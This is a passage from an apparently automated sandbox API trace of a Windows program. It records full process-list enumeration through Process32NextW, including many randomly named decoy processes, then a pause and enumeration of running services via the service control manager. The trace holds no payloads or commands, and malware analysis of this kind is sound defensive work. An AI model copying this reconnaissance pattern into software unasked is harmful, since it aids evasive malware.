th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.516] lstrlenW (lpString="csrss.exe") returned 9 [0215.516] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.517] lstrlenW (lpString="winlogon.exe") returned 12 [0215.517] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.518] lstrlenW (lpString="services.exe") returned 12 [0215.518] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.518] lstrlenW (lpString="lsass.exe") returned 9 [0215.518] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.519] lstrlenW (lpString="svchost.exe") returned 11 [0215.519] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0215.520] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0215.520] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0215.521] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0215.521] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.521] lstrlenW (lpString="svchost.exe") returned 11 [0215.521] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.522] lstrlenW (lpString="dwm.exe") returned 7 [0215.522] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.523] lstrlenW (lpString="svchost.exe") returned 11 [0215.523] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.524] lstrlenW (lpString="svchost.exe") returned 11 [0215.524] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.524] lstrlenW (lpString="svchost.exe") returned 11 [0215.524] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.525] lstrlenW (lpString="svchost.exe") returned 11 [0215.526] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.527] lstrlenW (lpString="svchost.exe") returned 11 [0215.527] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.527] lstrlenW (lpString="svchost.exe") returned 11 [0215.527] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.528] lstrlenW (lpString="svchost.exe") returned 11 [0215.528] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.529] lstrlenW (lpString="svchost.exe") returned 11 [0215.529] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.530] lstrlenW (lpString="svchost.exe") returned 11 [0215.530] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.530] lstrlenW (lpString="spoolsv.exe") returned 11 [0215.530] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.531] lstrlenW (lpString="svchost.exe") returned 11 [0215.531] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.532] lstrlenW (lpString="svchost.exe") returned 11 [0215.532] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.533] lstrlenW (lpString="audiodg.exe") returned 11 [0215.533] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.533] lstrlenW (lpString="sihost.exe") returned 10 [0215.533] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.534] lstrlenW (lpString="svchost.exe") returned 11 [0215.534] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.535] lstrlenW (lpString="taskhostw.exe") returned 13 [0215.535] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0215.535] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0215.535] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0215.536] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0215.536] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.537] lstrlenW (lpString="explorer.exe") returned 12 [0215.537] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0215.538] lstrlenW (lpString="Memory Compression") returned 18 [0215.538] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.538] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0215.539] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.539] lstrlenW (lpString="SearchUI.exe") returned 12 [0215.539] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.540] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0215.540] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.541] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0215.542] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0215.543] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0215.543] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0215.543] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0215.543] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.544] lstrlenW (lpString="conhost.exe") returned 11 [0215.544] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0215.545] lstrlenW (lpString="roof competitive.exe") returned 20 [0215.545] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0215.546] lstrlenW (lpString="trustees.exe") returned 12 [0215.546] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0215.546] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0215.546] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0215.547] lstrlenW (lpString="isbn.exe") returned 8 [0215.547] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0215.548] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0215.548] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0215.549] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0215.549] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0215.549] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0215.550] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0215.550] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0215.550] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0215.551] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0215.551] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0215.552] lstrlenW (lpString="playstation iraq.exe") returned 20 [0215.552] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0215.552] lstrlenW (lpString="harbor.exe") returned 10 [0215.552] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0215.553] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0215.553] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0215.554] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0215.554] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0215.555] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0215.555] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0215.555] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0215.555] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0215.556] lstrlenW (lpString="larent.exe") returned 10 [0215.556] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0215.557] lstrlenW (lpString="stereo.exe") returned 10 [0215.557] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0215.558] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0215.558] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0215.559] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0215.559] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0215.560] lstrlenW (lpString="state.exe") returned 9 [0215.560] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0215.561] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0215.561] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.562] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0215.562] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.563] lstrlenW (lpString="taskhostw.exe") returned 13 [0215.563] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0215.564] lstrlenW (lpString="sppsvc.exe") returned 10 [0215.564] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.567] lstrlenW (lpString="svchost.exe") returned 11 [0215.567] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0215.568] lstrlenW (lpString="Pg.exe") returned 6 [0215.568] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0215.569] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0215.569] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.570] lstrlenW (lpString="conhost.exe") returned 11 [0215.570] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0215.570] lstrlenW (lpString="cmd.exe") returned 7 [0215.570] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.571] lstrlenW (lpString="conhost.exe") returned 11 [0215.571] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0215.572] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0215.572] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0215.573] lstrlenW (lpString="conhost.exe") returned 11 [0215.573] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0215.574] CloseHandle (hObject=0x424) returned 1 [0215.574] Sleep (dwMilliseconds=0x1f4) [0216.080] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bb70 [0216.080] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0216.081] GetLastError () returned 0xea [0216.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40fae90 [0216.081] EnumServicesStatusExW (in: hSCManager=0x236bb70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40fae90, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40fae90, pcbBytesNeeded=0x291ff3c, 